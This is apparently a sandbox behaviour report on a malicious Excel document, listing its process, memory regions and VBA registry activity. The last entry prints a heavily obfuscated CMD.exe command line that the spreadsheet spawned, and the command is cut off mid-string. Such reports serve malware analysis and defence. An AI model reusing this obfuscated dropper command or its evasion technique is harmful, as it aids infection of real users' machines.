81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804 (SHA256)
2018110654968.xls.t.xls
Excel Document
Created at 2018-11-06 08:00:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: excel.exe
1850
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\excel.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:38, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:57, Reason: Self Terminated |
| Monitor Duration | 00:03:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8e4 |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AA8
0x
AA4
0x
AA0
0x
A9C
0x
A94
0x
A90
0x
A8C
0x
A88
0x
A84
0x
A7C
0x
A78
0x
A70
0x
A68
0x
A64
0x
A60
0x
988
0x
954
0x
950
0x
94C
0x
948
0x
944
0x
940
0x
93C
0x
938
0x
934
0x
930
0x
92C
0x
928
0x
924
0x
904
0x
900
0x
8FC
0x
8F8
0x
8F4
0x
8F0
0x
8EC
0x
8E8
0x
AB8
0x
ABC
0x
AE4
0x
B0C
0x
804
0x
A58
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00132fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0014ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00152fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00162fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00172fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00182fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00292fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x01c3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01c40000 | 0x01f0efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001f10000 | 0x01f10000 | 0x02302fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002310000 | 0x02310000 | 0x02310fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002320000 | 0x02320000 | 0x02320fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002330000 | 0x02330000 | 0x02330fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002340000 | 0x02340000 | 0x02340fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002350000 | 0x02350000 | 0x02351fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02360000 | 0x0236bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02370000 | 0x02377fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02380000 | 0x0238ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002390000 | 0x02390000 | 0x02390fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x023d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x024effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x026f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x02700fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002710000 | 0x02710000 | 0x02710fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x02720fff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x02730000 | 0x02733fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02740000 | 0x0276ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x02770000 | 0x02773fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x02780fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002790000 | 0x02790000 | 0x0280ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002810000 | 0x02810000 | 0x028eefff | Pagefile Backed Memory | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x028f0000 | 0x02955fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002960000 | 0x02960000 | 0x02961fff | Pagefile Backed Memory | r |
|
|
|
- |
| comdlg32.dll.mui | 0x02970000 | 0x0297cfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002980000 | 0x02980000 | 0x02981fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002b90000 | 0x02b90000 | 0x02b91fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002ba0000 | 0x02ba0000 | 0x02ba0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002bb0000 | 0x02bb0000 | 0x02bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002bd0000 | 0x02bd0000 | 0x02bd1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02be0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bf0000 | 0x02bf0000 | 0x02ceffff | Private Memory | rw |
|
|
|
- |
| xlintl32.dll | 0x02cf0000 | 0x03d37fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003d40000 | 0x03d40000 | 0x03e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003e40000 | 0x03e40000 | 0x03f3ffff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x03f40000 | 0x03f50fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000003f60000 | 0x03f60000 | 0x03f61fff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x03f70000 | 0x03f8ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003f90000 | 0x03f90000 | 0x0408ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x04090000 | 0x0410efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004110000 | 0x04110000 | 0x0418ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000004190000 | 0x04190000 | 0x04190fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000041a0000 | 0x041a0000 | 0x041a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000041b0000 | 0x041b0000 | 0x041b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041c0000 | 0x041c0000 | 0x042bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000042c0000 | 0x042c0000 | 0x042c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000042d0000 | 0x042d0000 | 0x042d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042e0000 | 0x042e0000 | 0x042e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042f0000 | 0x042f0000 | 0x042f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004300000 | 0x04300000 | 0x04300fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004310000 | 0x04310000 | 0x0440ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004410000 | 0x04410000 | 0x04411fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004420000 | 0x04420000 | 0x04420fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004430000 | 0x04430000 | 0x0452ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004530000 | 0x04530000 | 0x04531fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x04540fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x04551fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004560000 | 0x04560000 | 0x04560fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004570000 | 0x04570000 | 0x04570fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004580000 | 0x04580000 | 0x04580fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004590000 | 0x04590000 | 0x04590fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045a0000 | 0x045a0000 | 0x045affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045b0000 | 0x045b0000 | 0x045b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045c0000 | 0x045c0000 | 0x045c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045d0000 | 0x045d0000 | 0x045d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045e0000 | 0x045e0000 | 0x0465ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004660000 | 0x04660000 | 0x04671fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004680000 | 0x04680000 | 0x04680fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x04690fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x0471ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004720000 | 0x04720000 | 0x04720fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004730000 | 0x04730000 | 0x04730fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004740000 | 0x04740000 | 0x0474ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004750000 | 0x04750000 | 0x04b4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04b61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04b70fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04b80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b90000 | 0x04b90000 | 0x04b90fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ba0000 | 0x04ba0000 | 0x04ba1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04bb2fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bc2fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x050cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x050d2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050e0000 | 0x050e0000 | 0x050e2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050f0000 | 0x050f0000 | 0x050fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x05101fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005110000 | 0x05110000 | 0x05110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x05120fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005130000 | 0x05130000 | 0x05130fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005140000 | 0x05140000 | 0x05140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005150000 | 0x05150000 | 0x0524ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x05250000 | 0x0530ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000005310000 | 0x05310000 | 0x05310fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005320000 | 0x05320000 | 0x05320fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005330000 | 0x05330000 | 0x05330fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005340000 | 0x05340000 | 0x05340fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005350000 | 0x05350000 | 0x05351fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005360000 | 0x05360000 | 0x05360fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005370000 | 0x05370000 | 0x0546ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005470000 | 0x05470000 | 0x054b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000054c0000 | 0x054c0000 | 0x054c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000054d0000 | 0x054d0000 | 0x054d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000054e0000 | 0x054e0000 | 0x054e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000054f0000 | 0x054f0000 | 0x054f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005500000 | 0x05500000 | 0x055fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005600000 | 0x05600000 | 0x05647fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005650000 | 0x05650000 | 0x05650fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005660000 | 0x05660000 | 0x05660fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005670000 | 0x05670000 | 0x05670fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005680000 | 0x05680000 | 0x05681fff | Pagefile Backed Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 386 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
Registry (59)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\409 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\9 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 84, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 255, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64 | data = C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 | data = C:\Windows\system32\stdole2.tlb |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = VbaCapability, data = 64 |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ 